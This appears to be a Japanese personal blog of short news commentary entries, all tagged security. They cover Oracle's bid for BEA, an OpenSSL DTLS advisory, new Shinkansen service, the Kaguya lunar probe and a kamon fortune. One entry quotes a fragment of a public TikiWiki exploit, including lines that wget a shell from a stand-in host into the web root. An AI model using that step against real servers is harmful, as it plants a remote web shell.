綾鷹KAMONジェネレーター

セキュリティ
まっちゃだいふくは、”四つ葉”らしいです。

四葉

四葉紋のあなたは争いごとを遠ざけ、平和を好む温和な性格。周りとの調和を大切にし、多くの人々と手に手をとって生きてゆけば必ずや、あなたも、そしてあなたを取り巻く人々も平穏で素敵な人生を送れることでしょう。持ち前の優しさと協調性を大切にして、素敵な日々を過ごしてください。

Japan.internet.com Webファイナンス - Oracle が BEA に現金67億ドルの買収案提示、敵対買収に発展か

セキュリティ

OracleがBEAを敵対的買収を提示したそうですが、BEAは拒否したそうです

企業向けソフトウェア大手の Oracle は12日、難題を抱えたミドルウェア大手 BEA Systems に対し、BEA 株1株あたり現金17ドルの買収提案を行なったと発表した。Oracle は最大の競合相手に、新たな悩みの種を与えたといえる。
この金額は、11日の BEA 株終値13.62ドルに対して25%のプレミアムを乗せた額で、BEA の発行済み株式数から計算して、買収総額はおよそ67億ドルとなる。

お金の問題かい!!!w

【続報】米BEAシステムズ、米オラクルの買収提案を拒否:ITpro

米BEAシステムズは10月12日(現地時間)、米オラクルからの買収提案(関連記事)を拒否する考えを示した。声明のなかで、「オラクルが示した1株当たり17ドルという提案は、BEAシステムズの価値を著しく低く評価している」と表明。この内容を、11日にオラクルへ書簡で伝えたことも同時に明らかにした。

TikiWiki

セキュリティ

TikiWikiのtiki-graph_formula.phpのコマンドが実行できちゃう脆弱性についてExploitが出ています。

# Description
# -----------
# TikiWiki contains a flaw that may allow a remote attacker to execute arbitrary commands. 
# The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input 
# supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP 
# commands resulting in a loss of integrity.

print "[?] php shell it?\n";
print "[*] wget http://www.youhost.com/yourshell.txt -O backups/shell.php\n";
print "[*] lynx " . $target . "/backups/shell.php\n\n";

asahi.com:新幹線、新大阪―鹿児島が直通 11年春、4時間で結ぶ - ビジネス

セキュリティ

2011年に九州新幹線が開通するに当たってJR西日本が、新大阪→鹿児島線直通ラインを作るそうです。4時間かぁ、微妙。

九州新幹線が2011年春に全線開業するのに合わせ、JR西日本と九州は、山陽新幹線の新大阪から博多経由で鹿児島中央まで直通運転する列車を走らせることで正式に合意した。来週にも両社の社長が発表する。異なる運行条件が壁になっていたが、双方の規格に合わせた新車両を製造することで実現させる。新大阪から熊本までを約3時間、鹿児島中央までを約4時間で結び、飛行機の利用客を取り込むのが狙い。西日本の新幹線は新たな時代に入る。

OpenSSL Security Advisory(US-CERT Current Activity)

セキュリティ

OpenSSLが2つの脆弱性を出しています。

OpenSSL has released a security advisory to address two vulnerabilities in OpenSSL. These vulnerabilities may allow a remote, unauthenticated attacker to execute arbitrary code on an affected system, other impacts are unknown at this time.<<<

詳細は以下らしいです。

Andy Polyakov discovered a flaw in OpenSSL's DTLS implementation which
could lead to the compromise of clients and servers with DTLS enabled.

DTLS is a datagram variant of TLS specified in RFC 4347 first
supported in OpenSSL version 0.9.8. Note that the vulnerabilities do
not affect SSL and TLS so only clients and servers explicitly using
DTLS are affected.

Moritz Jodeit found an off-by-one error in SSL_get_shared_ciphers(), a
function that should normally only be used for logging or debugging.

The impact of this overflow is unclear.

This vulnerability is tracked as CVE-2007-5135.

asahi.com: 「かぐや」と別れ「おきな」「おうな」 衛星を分離 - サイエンス

セキュリティ

かぐやが、おうなとおきなの衛星と分離したそうです。予定通りですね。

月探査機「かぐや」は12日、二つ目の子衛星(VRAD衛星)の分離に成功した。宇宙航空研究開発機構は、9日に分離した一つ目の子衛星(リレー衛星)を「おきな」、VRAD衛星を「おうな」と名付けたと発表した。かぐや姫を見守るおじいさん(おきな)とおばあさん(おうな)にちなんだという。